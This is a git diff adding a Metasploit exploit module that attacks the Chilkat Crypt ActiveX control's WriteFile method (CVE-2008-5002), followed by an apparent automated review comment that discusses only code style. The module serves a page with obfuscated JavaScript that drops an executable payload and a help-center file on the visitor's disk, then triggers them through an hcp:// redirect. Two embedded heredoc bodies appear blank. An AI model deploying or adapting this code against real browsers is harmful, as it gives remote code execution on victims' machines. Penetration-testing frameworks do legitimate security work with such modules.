diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
new file mode 100644
index 0000000000..420cb8a6f2
--- /dev/null
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@@ -0,0 +1,141 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Chilkat Crypt ActiveX WriteFile Unsafe Method',
+ 'Description' => %q{
+ This module allows attackers to execute code via the 'WriteFile' unsafe method of
+ Chilkat Software Inc's Crypt ActiveX control.
+
+ This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to
+ execute our payload immediately. However, this method requires that the victim user
+ be browsing with Administrator. Additionally, this method will not work on newer
+ versions of Windows.
+
+ NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at
+ the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'shinnai', 'jduck' ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2008-5002' ],
+ [ 'OSVDB', '49510' ],
+ [ 'BID', '32073' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/6963' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2048
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ ],
+ 'DefaultTarget' => 0))
+
+ end
+
+ def autofilter
+ false
+ end
+
+ def check_dependencies
+ use_zlib
+ end
+
+ def on_request_uri(cli, request)
+
+ # Set parameters
+ fnname = rand_text_alpha(8+rand(8))
+ si_name = "msinfo" # must be this, other names don't seem to work
+ exe_name = rand_text_alpha(8+rand(8))
+ hcp_path = "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\#{si_name}.htm"
+ hcp_url = "hcp:\\x2f\\x2fsystem/sysinfo/#{si_name}.htm"
+ exe_path = "C:\\#{exe_name}.exe"
+
+ # Generate HCP data
+ hcp_data = %Q|
+
+|
+
+ # (Re-)Generate the EXE payload
+ return if ((p = regenerate_payload(cli)) == nil)
+ exe_data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
+
+ # Encode variables
+ hcp_str = Rex::Text.to_unescape(hcp_data)
+ hcp_path.gsub!(/\\/, '\\\\\\\\')
+ exe_str = Rex::Text.to_unescape(exe_data)
+ exe_path.gsub!(/\\/, '\\\\\\\\')
+
+ # Build the final JS
+ js = %Q|
+function #{fnname}()
+{
+ var my_unescape = unescape;
+ var obj = new ActiveXObject("ChilkatCrypt2.ChilkatCrypt2");
+ var exe_path = "#{exe_path}";
+ var exe_str = "#{exe_str}";
+ var exe_data = my_unescape(exe_str);
+ obj.WriteFile(exe_path, exe_data);
+ var hcp_str = "#{hcp_str}";
+ var hcp_data = my_unescape(hcp_str);
+ var hcp_path = "#{hcp_path}";
+ obj.WriteFile(hcp_path, hcp_data);
+ window.location = "#{hcp_url}";
+}
+|
+
+ # Obfuscate the javascript
+ opts = {
+ 'Strings' => false, # didn't work in this case
+ 'Symbols' => {
+ 'Variables' => %w{ my_unescape obj exe_path exe_str exe_data hcp_str hcp_data hcp_path }
+ }
+ }
+ js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
+ js.obfuscate()
+
+ # Build the final HTML
+ content = %Q|
+
+
+
+
+Please wait...
+
+
+|
+
+ print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+ send_response_html(cli, content)
+
+ handler(cli)
+
+ end
+
+end
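Review bot: The guard under `# (Re-)Generate the EXE payload`, `return if ((p = regenerate_payload(cli)) == nil)`, compares against nil explicitly inside redundant parentheses where a plain guard clause reads better: `return unless (p = regenerate_payload(cli))`. The same method has a few formatting nits worth a pass before merge: `rand_text_alpha(8+rand(8))` and `to_win32pe(framework,p.encoded)` are missing spaces around `+` and after the comma, and `js.obfuscate()` carries empty parentheses on a no-argument call. The `request` parameter of `on_request_uri` is never read in the body; if the framework fixes that signature, naming it `_request` would at least mark it as intentionally unused. The `hcp_data` and `content` heredocs appear to have lost their body in this rendering, so their contents could not be reviewed here.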